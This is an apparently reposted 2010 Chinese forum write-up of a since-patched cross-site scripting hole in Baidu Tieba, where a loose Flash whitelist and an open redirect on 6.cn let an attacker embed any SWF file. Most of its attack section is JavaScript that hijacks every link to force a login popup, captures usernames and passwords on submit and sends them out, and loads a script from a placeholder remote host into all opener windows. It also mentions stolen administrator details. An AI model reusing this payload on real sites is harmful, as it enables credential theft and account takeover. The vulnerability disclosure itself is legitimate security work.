标题:
百度贴吧跨站的细节
[打印本页]
作者:
keylong
时间:
2010-6-4 23:13
标题:
百度贴吧跨站的细节
百度贴吧跨站的细节
文章录入:浣花溪 责任编辑:snow 121
【字体:小 大】
前段时间发现了QQ、百度等一些安全问题,已补。QQ的那个比较敏感不能发了,摘几段百度的细节发发吧。
漏洞细节:
百度X吧发帖允许发送指定白名单URL的FLASH,白名单如下:
flashWhiteList:["<a href="http://www.tudou.com/v/%22,%22
http://www.tudou.com/player/playlist.swf?lid=
","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/">http://www.tudou.com/v/","http://www.tudou.com/player/playlist.swf?lid=","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/"]
复制代码
黑客只需要在白名单URL中找到一个可以嵌入FLASH的漏洞,原白名单
http://6.cn/
的URL过于宽松,于是在
http://6.cn
上找到一个301,302状态的转跳URL即可嵌入任意的FLASH文件,如:
http://6.cn/logout.php?next_action=http://xxxxxx/xxxx.swf
该FLASH的功能是在当前页面嵌入一个js,同时在有关联关系的引用窗口跨页面嵌入一个js,也就是在x吧浏览过的网页都能被自动嵌入js。该JS脚本的功能是劫持用户的点击,强制用户登录,并记录用户输入的密码!
部分代码如下:
1.劫持网页所有的链接,强制弹出登录框
for(i=0;i<document.links.length;i++){
document.links
.onclick=function(){
TbUtil.login(); //x吧自带的登录函数,弹出登录框层。
return false;
}
}
复制代码
2.劫持登录框的输入,取到用户输入的用户名和密码,并偷偷发送到远程。
document.onkeyup=function(){
document.forms['PassFormlogin'].onsubmit=function(){
pwd = this.PassInputUsername0.value + '|' + this.PassInputPassword0.value;
log(escape(pwd));
}
}
复制代码
3.跨页面劫持窗口
function i_(){
with(document){getElementsByTagName('head')[0].appendChild(createElement('script')).src='http://xxx/xxx.js';
}
}i_()
w_=window;
while(w_=w_.opener){
try{
w_.eval(i_.toString()+'i_()')
}catch(e){}
}
复制代码
盗取的管理员的细节:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
摘自红色黑客联盟(
www.7747.net
) 原文:
http://www.7747.net/Article/201005/47482.html
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2